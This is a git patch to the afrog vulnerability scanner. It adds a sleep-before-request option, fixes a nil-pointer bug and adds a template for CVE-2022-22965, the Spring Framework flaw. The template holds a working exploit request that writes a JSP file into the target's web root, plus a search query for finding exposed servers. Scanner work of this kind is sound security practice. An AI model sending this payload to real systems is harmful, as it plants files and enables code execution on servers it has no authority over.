From 0502158423bc1b5bf45022a35a7da13838d88a9d Mon Sep 17 00:00:00 2001 From: zan8in Date: Wed, 6 Apr 2022 19:23:02 +0800 Subject: [PATCH] add before sleep & fixed result append nil pointer bug --- afrog-pocs/README.md | 3 ++ afrog-pocs/unreviewed/CVE-2022-22965.yaml | 34 +++++++++++++++++++++++ pkg/core/checker.go | 14 ++++++++-- pkg/poc/poc.go | 3 ++ 4 files changed, 52 insertions(+), 2 deletions(-) create mode 100644 afrog-pocs/unreviewed/CVE-2022-22965.yaml diff --git a/afrog-pocs/README.md b/afrog-pocs/README.md index 759ec14e..943ef3e2 100644 --- a/afrog-pocs/README.md +++ b/afrog-pocs/README.md @@ -59,6 +59,7 @@ rules: exppression: response.status == 200 && response.body.bcontains(b'PHP Version') stop_if_match: true r1: + before_sleep: 6 request: method: GET path: /info.php @@ -83,6 +84,8 @@ stop_if_match: 如果匹配就停止 stop_if_mismatch:如果不匹配就停止 +before_sleep: 顾名思义,http 请求前 sleep 6 秒钟 + expression: 最外面的 `expression` 是 `rules` 的验证表达式,`r0() || r1()` 表示 `r0` 和 `r1` 两个规则,匹配一个表达式就为 `true`,代表漏洞存在。 > 如果 rules 表达式都是 `||`关系,比如:r0() || r1() || r2() ... ,默认执行 `stop_if_match` 动作。同理,如果表达式都是 `&&` 关系,默认执行 `stop_if_mismatch` 动作。 diff --git a/afrog-pocs/unreviewed/CVE-2022-22965.yaml b/afrog-pocs/unreviewed/CVE-2022-22965.yaml new file mode 100644 index 00000000..fd6080c0 --- /dev/null +++ b/afrog-pocs/unreviewed/CVE-2022-22965.yaml @@ -0,0 +1,34 @@ +id: CVE-2022-22965 + +info: + name: Spring Framework RCE JDK 9+ + author: zan8in + severity: critical + description: | + srping framework 结合JDK9及以上新版本的特性可以实现对历史漏洞补丁的绕过从而实现远程代码执行 + Fofa: app="vmware-SpringBoot-Framework" + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2022-22965 + +set: + randTxt: randomInt(800000000, 1000000000) + exploitName: randomInt(800000000, 1000000000) +rules: + r0: + request: + method: POST + path: / + headers: + C2: "<%" + Suffix: "%>" + body: | + class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7BC2%7Di%20if(%22j%22.equals(%22j%22))%7B%20out.println(new%20String(%22{{randTxt}}%22))%3B%20%7D%25%7BSuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix={{exploitName}}&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat= + expression: response.status == 200 + r1: + before_sleep: 6 + request: + method: GET + path: /{{exploitName}}.jsp + expression: response.status == 200 && response.body.bcontains(b'{{exploitName}}') + +expression: r0() && r1() \ No newline at end of file diff --git a/pkg/core/checker.go b/pkg/core/checker.go index 72901cbc..39a27075 100644 --- a/pkg/core/checker.go +++ b/pkg/core/checker.go @@ -5,6 +5,7 @@ import ( "net/http" "net/url" "strings" + "time" "github.com/google/cel-go/checker/decls" "github.com/zan8in/afrog/pkg/config" @@ -75,6 +76,9 @@ func (c *Checker) Check(target string, pocItem poc.Poc) (err error) { k := ruleMap.Key rule := ruleMap.Value + if rule.BeforeSleep != 0 { + time.Sleep(time.Duration(rule.BeforeSleep) * time.Second) + } utils.RandSleep(500) isMatch := false @@ -94,8 +98,14 @@ func (c *Checker) Check(target string, pocItem poc.Poc) (err error) { c.UpdateVariableMap(rule.Output) } - c.Result.AllPocResult = append(c.Result.AllPocResult, - &PocResult{IsVul: isMatch, ResultRequest: c.VariableMap["request"].(*proto.Request), ResultResponse: c.VariableMap["response"].(*proto.Response)}) + pocRstTemp := PocResult{IsVul: isMatch} + if c.VariableMap["response"] != nil { + pocRstTemp.ResultResponse = c.VariableMap["response"].(*proto.Response) + } + if c.VariableMap["request"] != nil { + pocRstTemp.ResultRequest = c.VariableMap["request"].(*proto.Request) + } + c.Result.AllPocResult = append(c.Result.AllPocResult, &pocRstTemp) if rule.StopIfMismatch && !isMatch { c.Result.IsVul = false diff --git a/pkg/poc/poc.go b/pkg/poc/poc.go index 14d05842..d64ee8c7 100644 --- a/pkg/poc/poc.go +++ b/pkg/poc/poc.go @@ -50,6 +50,7 @@ type Rule struct { Output yaml.MapSlice `yaml:"output"` StopIfMatch bool `yaml:"stop_if_match"` StopIfMismatch bool `yaml:"stop_if_mismatch"` + BeforeSleep int `yaml:"before_sleep"` order int } @@ -59,6 +60,7 @@ type ruleAlias struct { Output yaml.MapSlice `yaml:"output"` StopIfMatch bool `yaml:"stop_if_match"` StopIfMismatch bool `yaml:"stop_if_mismatch"` + BeforeSleep int `yaml:"before_sleep"` } // http/tcp/udp cache 是否使用缓存的请求,如果该选项为 true,那么如果在一次探测中其它脚本对相同目标发送过相同请求,那么便使用之前缓存的响应,而不发新的数据包 @@ -164,6 +166,7 @@ func (r *Rule) UnmarshalYAML(unmarshal func(interface{}) error) error { r.Output = tmp.Output r.StopIfMatch = tmp.StopIfMatch r.StopIfMismatch = tmp.StopIfMismatch + r.BeforeSleep = tmp.BeforeSleep r.order = order order += 1